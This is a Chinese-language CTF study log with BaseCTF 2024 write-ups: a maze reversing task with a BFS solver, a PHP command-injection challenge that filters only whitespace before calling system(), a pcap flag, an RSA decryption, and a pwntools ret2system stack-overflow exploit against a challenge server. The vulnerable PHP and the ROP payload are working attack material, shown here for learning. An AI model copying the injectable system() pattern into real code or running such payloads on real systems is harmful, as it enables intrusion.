1.18学习记录

re

basectf2024 ez_maze

先查壳在这里插入图片描述发现是没壳是64位文件，用ida看看
找到主调函数，查看伪C

int __fastcall main(int argc, const char **argv, const char **envp)
{int v3; // eaxchar v5[32]; // [rsp+20h] [rbp-60h] BYREF__int16 v6; // [rsp+40h] [rbp-40h]char v7; // [rsp+42h] [rbp-3Eh]int i; // [rsp+48h] [rbp-38h]int v9; // [rsp+4Ch] [rbp-34h]sub_401840(argc, argv, envp);j_puts(Buffer);j_puts(aTakeTheShortes);j_puts(aShowYourTime);memset(v5, 0, sizeof(v5));v6 = 0;v7 = 0;j_scanf("%34s", v5);v9 = 0;for ( i = 0; v5[i]; ++i ){v3 = (unsigned __int8)v5[i];if ( v3 == 100 ){if ( v9 % 15 == 14 )goto LABEL_20;++v9;}else if ( (unsigned __int8)v5[i] > 0x64u ){if ( v3 == 115 ){if ( v9 > 209 )goto LABEL_20;v9 += 15;}else{if ( v3 != 119 ){
LABEL_21:j_puts(aInvalidInput);return -1;}if ( v9 <= 14 )goto LABEL_20;v9 -= 15;}}else{if ( v3 != 97 )goto LABEL_21;if ( !(v9 % 15) ){
LABEL_20:j_puts(aInvalidMoveOut);return -1;}--v9;}if ( asc_403020[v9] == 36 ){j_puts(aInvalidMoveHit);return -1;}if ( asc_403020[v9] == 121 ){j_puts(aYouWin);j_puts(aPlzBasectfLowe);return 0;}}j_puts(aYouDidnTReachT);return 0;

首先可以看出，这里调用了指针模块，结合题目maze可以推断出这是一个迷宫问题，接着看v3的赋值，很明显这里是根据v3传入的参数执行命令，但题目中的v3都是给了数字，就很容易联想到ASCII码表，去查了一下果然是wasd 在这里插入图片描述同时也从上面的代码看出迷宫起点是x终点是y，接下来在分析迷宫的大小，可以看出按下s键的时候向右移动了15格，说明迷宫的行宽是15接下来去找迷宫先找到了规则是要找最短路径然后md5加密，迷宫去view hex里面找形状，在通过shift+e提取出来，手搓一下外壳在这里插入图片描述从x走到y就行了，因为不是很会dfs算法，就手搓了走出来是sssssssddddwwwddsssssssdddsssddddd，用md5加密一下

这是大佬写的解密脚本

maze = [8, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1,0, 1, 0, 1, 1, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1,0, 1, 0, 1, 1, 1, 0, 0, 1, 1, 1, 1, 0, 1, 1,0, 1, 1, 1, 0, 0, 0, 1, 1, 1, 1, 1, 0, 1, 1,0, 1, 1, 1, 0, 1, 0, 0, 1, 0, 1, 1, 1, 1, 1,0, 1, 1, 1, 0, 1, 0, 1, 1, 0, 0, 0, 1, 1, 1,0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 1, 1, 1,1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1,1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1,1, 1, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1, 1, 1,1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1,1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 1,1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 0, 1, 1, 1,1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 9
]visited = [0] * (15 * 15)  # 记录访问过的点def BFS(maze, x, y):queue = [(x, y, '')]  # 设置队列，bfs用队列，dfs用栈while queue:x, y, path = queue.pop(0)if x < 15 and y < 15 and x >= 0 and y >= 0 and visited[x * 15 + y] != 1 and maze[x * 15 + y] != 1:visited[x * 15 + y] = 1  # 证明已经访问过了queue.append((x + 1, y, path + 's'))  # 只能字符串相加queue.append((x, y - 1, path + 'a'))queue.append((x, y + 1, path + 'd'))queue.append((x - 1, y, path + 'w'))else:continueif maze[x * 15 + y] == 9:return pathflag = BFS(maze, 0, 0)
print(flag)

脚本跑出来也是这个结果
最后解得：basectf{131b7d6e60e8a34cb01801ae8de07efe}

web

basectf2024 RCEisamazingwithspace

这题是一个简单的空格绕过post传参在这里插入图片描述代码审计

<?php
highlight_file(__FILE__);
$cmd = $_POST['cmd'];
// check if space is present in the command
// use of preg_match to check if space is present in the command
if (preg_match('/\s/', $cmd)) {echo 'Space not allowed in command';exit;
}// execute the command
system($cmd);

一个post传参
在这里插入图片描述

misc

basectf2024 海上遇到了鲨鱼

题目附件下载后是一个流量包，这题是一个流量包分析题，先分析追踪流
在tcp流中没找到flag 在这里插入图片描述在http追踪流中就发现了用脚本倒序过来

s="}67bf613763ca-50b3-4437-7a3a-b683fe51{FTCesaB"#输入需要镜像的字符
reseved_s=s[::-1]
print(reseved_s)

得flag BaseCTF{15ef386b-a3a7-7344-3b05-ac367316fb76}

crypto

basectf2024 babyrsa

rsa加解密

from Crypto.Util.number import *flag=b'BaseCTF{}'
m=bytes_to_long(flag)n=getPrime(1024)
e=65537
c=pow(m,e,n)print("n =",n)
print("e =",e)
print("c =",c)
"""
n = 104183228088542215832586853960545770129432455017084922666863784677429101830081296092160577385504119992684465370064078111180392569428724567004127219404823572026223436862745730173139986492602477713885542326870467400963852118869315846751389455454901156056052615838896369328997848311481063843872424140860836988323
e = 65537
c = 82196463059676486575535008370915456813185183463924294571176174789532397479953946434034716719910791511862636560490018194366403813871056990901867869218620209108897605739690399997114809024111921392073218916312505618204406951839504667533298180440796183056408632017397568390899568498216649685642586091862054119832
"""

exp：

from Crypto.Util.number import *
import gmpy2
n = 104183228088542215832586853960545770129432455017084922666863784677429101830081296092160577385504119992684465370064078111180392569428724567004127219404823572026223436862745730173139986492602477713885542326870467400963852118869315846751389455454901156056052615838896369328997848311481063843872424140860836988323
e = 65537
c = 82196463059676486575535008370915456813185183463924294571176174789532397479953946434034716719910791511862636560490018194366403813871056990901867869218620209108897605739690399997114809024111921392073218916312505618204406951839504667533298180440796183056408632017397568390899568498216649685642586091862054119832phin = n-1
d = gmpy2.invert(e, phin)
m = pow(c, d, n)
print(long_to_bytes(m))

pwn

basectf2024 我把她丢了

查壳在这里插入图片描述放到ida看一下
找到主调函数，发现在read处存在栈溢出因为是64位文件，需要找寄存器找一下bin/sh的地址exp：

from pwn import *
io=process('./pwn')
io=remote("gz.imxbt.cn",20389)
elf=ELF('./pwn')
pop_rdi=0x401196
binsh=0x402008
ret=0x40101a
shell=elf.plt['system']
payload=b'a'*(0x70+8)+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(shell)
io.recv()
io.sendline(payload)
io.interactive()